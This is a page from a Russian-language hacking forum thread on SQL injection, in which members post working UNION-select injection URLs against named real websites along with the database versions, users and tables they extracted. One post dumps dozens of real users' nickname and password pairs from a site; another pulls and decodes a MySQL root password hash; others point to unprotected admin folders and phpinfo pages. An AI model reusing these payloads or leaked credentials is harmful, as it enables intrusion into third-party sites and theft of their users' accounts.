HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 928 из 1602 « Первая < 428828878918 924 925 926 927 928 929 930 931 932 93897810281428 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.05.2009, 17:51
Rednoise
Новичок
Регистрация: 28.03.2007
Сообщений: 29
С нами: 10064404

Репутация: 41
По умолчанию
http://www.seo-cms.ru/news_article.php?id=-2692+union+select+version(),2,user(),4,database(), 6/*

4.1.20-lk-log:skvitrru_seo:skvitrru_seo@localhost

при дальнейшем составлении запроса на выборку из таблиц перекидывает на другой сайт, типа фильтр стоит какой то хз, кому интересно поковыряйте
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 19.05.2009, 18:04
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию
http://www.yp.md/news2/news.php?id=-261+union+select+1,2,3,4,version(),6,user(),8,9,10 ,11,12+--

PR 4

user() - ypmd_tester@localhost
version() - 5.0.67-community-log

есть таблица user_info ,но в ней ничего интересного нет....
 
Ответить с цитированием

  #3  
Старый 19.05.2009, 18:46
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами: 9095366

Репутация: 298
По умолчанию
http://valdis.org.ru/site.php?id=-2206+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a ,user(),version(),database()),11,12,13,14,15,16,17

valdis_valdis@localhost:5.0.77-community:valdis_valdis

http://valdis.org.ru/site.php?id=-2206+union+select+1,2,3,4,5,6,7,8,9,TABLE_NAME,11, 12,13,14,15,16,17+from+information_schema.tables+l imit+x,1

в базах ничего интересного не нашел.
PR4, ТИЦ 50

http://www.bank45.ru/site.php?id=-10028+union+select+concat_ws(0x3a,version(),user() ,database())/*

http://www.bank45.ru/site.php?id=-10028+union+select+login+from+users/*

данные выводятся в title

Нашел ещё вот что:
http://www.bank45.ru/users/
особенно понравилось, когда переход по ok.php

так же почерпнуть информацию можно здесь:
http://www.bank45.ru/phpinfo.php

PR2 , ТИЦ 10
Последний раз редактировалось jokester; 19.05.2009 в 19:11.. Причина: Объединяй посты
 
Ответить с цитированием

  #4  
Старый 19.05.2009, 20:42
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию
http://www.massiveattack.com/blog.php?id=-657%20union%20select%201,2,3,4,5,6,CONCAT_WS(7,%20 user(),%20version(),%20database()),8,9.10,11,12,13 ,14,15,16,17,18,19,20,21%20/*
 
Ответить с цитированием

  #5  
Старый 19.05.2009, 21:14
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами: 9428066

Репутация: 1668
По умолчанию
[PR 6]
Код:
http://perkins.pvt.k12.ma.us/museum/area.php?id=35+and+substring(@@version,1,1)=3
[PR 4]
Код:
http://www.unitech-adc.us/product_info.php?id=41+and+substring(@@version,1,1)=3
 
Ответить с цитированием

  #6  
Старый 19.05.2009, 22:20
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию
Ого скока уже накидали пока я в запое был суточном ))))ну что поехали

PR: 5

http://www.mondopop.it/news_view_iuk.php?id=-1+union+select+1,ver sion(),3,4,5, 6,7,8,9,10--

5.0.68-log

http://www.mondopop.it/news_view_iuk.php?id=-1+union+select+1,grou p_concat(table_name),3,4,5,6,7,8,9,10+from+informa tion_schema.tables+group +by+table_schema+limit+1,1 --

tables :

about,commenti_iuk,items,order_list,users_prova,ad min,country,kind,press,video,artist,editoriale,new s,users, commenti,exhibitions,news_iuk,users_press

http://www.mondopop.it/news_view_iuk.php?id=-1+union+select+1,group_conca t(concat_ws(0x3a,nick,pa ss)),3,4,5,6,7,8,9,10+from+use rs--

Цитата:
edinho:312630,maccuivovarna,keith82:keith82,silv ietta01:salento12,lozoodisimona:coccinella,alex-kama:kama1979,Mondovullo:mondopopchihiro,chicca:zu cchi81,bricius:carmillo,hero:rastapower,sofisoul:c ourmayeur,silvietta:salento12,Elisa:180276,bannann a:anna1126,travismanna:06021959,mohabadel:souris,d iavu:sofia,dragoorione:buruburu,Kite77:artura,magi c_mushroomasta123,crazy_luna:ilenia,Bongload:123 45678,ara:haraldone,steve:joejoe35,DocRaspa:181280 ,elMoro:nirvana81,giorgia:bernie,nikoka:netgear,36 68gabriele:giammone,fup1ippopippopop,mediaformat :mediaformat,T.U.B.E.:theurban,Akiko:tamachan,Ging erinnilinni,il7:sbrachetto,LINOandMIA:barvo,samm yrovaciancorasam1,mattteo:massacro23,snob:12345f ,deanpe:robyno69,chilucy:chilucy,jacques:yoyoyo79, lodeaustria:suministro,cla:dadamondopop,A Beatiful Ignorant Blond:blond86,Ironmould:dod77pop,bonkiettina:29048 0l,zuza_matuza:recfrbyf,gra:cerbiatto77,Bernie:son y444,frankie:KaPpy,Vocintesta:matteo1,fra:KaPpy

##########################################
PR: 2

http://www.greenparksystem.it/eng/prodotti2.php?id=-1+union+select+1,2,concat_ws(0x3a,u ser(),database(),versio n()),4,5,6,7,8--

greenpark@localhost:greenpark:4.1.21
Последний раз редактировалось HAXTA4OK; 19.05.2009 в 22:31..
 
Ответить с цитированием

  #7  
Старый 19.05.2009, 23:38
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами: 9095366

Репутация: 298
По умолчанию
http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4

5.0.22:us5167f@localhostivomani_shops

http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,TABLE_NAME,3,4+from+information _schema.tables+limit+50,1

Пробуем обратиться к: mysql.user
http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,Password,3,4+from+mysql.user+wh ere+User=0x726F6F74
Получаем: Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
ммм, несоответсвие кодировок. закодируем пароль в .. ну например в hex
http://www.rateshops.ru/shops.php?fil=&cid=-130+union+select+1,hex(Password),3,4+from+mysql.us er+where+User=0x726F6F74
получаем: 31666466326136313036646134646139
преобразовываем обратно: 1fdf2a6106da4da9

Сайт по началу произвел нормальное впечатление, аккуратный, наполненый, но практически в каждом скрипте уязвим к SQL-INJ...
по показателям, сайт нулевой...

ещё один сайт, нулевой, просто ради опыта...
http://stistroy.ru/site.php?id=-4+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8

5.0.67-log:u149824:u149824@10.10.153.196

через information_schema.tables можно посмотреть какие таблицы есть, но ничего интересного нет. да и сайт пустой.


http://www.proherm.ru/site.php?id=-3+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8

4.1.22-log:wwwprohermruroherm@fe42.hc.ru

http://www.proherm.ru/site.php?id=-3+union+select+1,login,3,4,5,6,7,8+from+accounts+l imit+1,1

login: proherm

но потом оказалось, что это не нужно, нашел:
http://www.proherm.ru/a/
где всё доступно и без паролей.


http://www.valdis.net.ru/site.php?id=-433+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, version(),database(),user()),11,12,13,14,15,16,17

5.0.77-community:valdis_valdis:valdis_valdis@localhost

http://www.valdis.net.ru/site.php?id=-433+union+select+1,2,3,4,5,6,7,8,9,TABLE_NAME,11,1 2,13,14,15,16,17+from+information_schema.tables+li mit+20,1
с 17 до 20 есть таблицы, с юзерами ничего не связано.


ТИЦ 50, PR 1
Последний раз редактировалось AlexSatter; 20.05.2009 в 00:20..
 
Ответить с цитированием

  #8  
Старый 20.05.2009, 07:36
Rav1n
Познающий
Регистрация: 05.11.2008
Сообщений: 92
С нами: 9217595

Репутация: 149
По умолчанию
Код:
http://www.tdnovator.com/item.php?division=2&id=-280+union+select+1,2,3,4,5,6,7,8,9,cast(concat_ws(0x3a,version(),database(),user())+as+binary),11,12,13,14,15,16,17,18--
4.1.13a-nt-max-log:1gb_tdnovatordb:1gb_tdnovatordb@10.0.1.8
Последний раз редактировалось jokester; 20.05.2009 в 11:31.. Причина: rsvp.com БОЯН
 
Ответить с цитированием

  #9  
Старый 20.05.2009, 11:24
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами: 9428066

Репутация: 1668
По умолчанию
[PR 5]
Код:
http://www.svoa.co.th/product_info.php?id=-70237+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
4.0.15a-log:svoaweb:root@172.17.10.14

[PR 3]
Код:
http://www.pakman.com.ru/product_info.php?id=-125+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8--
4.1.22-standard-log:pakmanc_pakman:pakmanc_pakman@localhost

[PR 0]
Код:
http://rmshop.ru/product_info.php?id=1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12--
4.1.22-log:wwwprinterovnet:printero@localhost

[PR 0]
Код:
http://www.valvesmanufacturer.cn/product_info.php?id=149+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10--
4.1.16-nt:glb1:glb1@bizcn-w85

[PR 0]
Код:
http://printerov.net/product_info.php?id=-40+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12--
4.1.22-log:wwwprinterovnet:printero@localhost

[PR 0]
Код:
http://printmag.ru/product_info.php?id=-211+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12--
4.1.22-log:wwwprinterovnet:printero@localhost
 
Ответить с цитированием

  #10  
Старый 20.05.2009, 11:42
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию
_http://www.energyflashrecords.co.uk/catalogue/title.phtml?product_id=-24946+union+select+1,2,3,4,concat_ws(0x3a,version( ),database(),user()),6,7,8,9,0,1,2,3,4,5,16+--

5.0.67-community:wiz_system:wiz_system@localhost

_http://www.webtrafficpromotions.com/product_detail.php?cid=3&pid=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,0,1,2,3,4,5,6--

5.0.77-community:webtraff_wtp1013:webtraff_wtp1013@localh ost
Последний раз редактировалось jokester; 20.05.2009 в 12:35.. Причина: ОБЪЕДИНЯЙ ПОСТЫ
 
Ответить с цитированием
Ответ
Страница 928 из 1602 « Первая < 428828878918 924 925 926 927 928 929 930 931 932 93897810281428 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.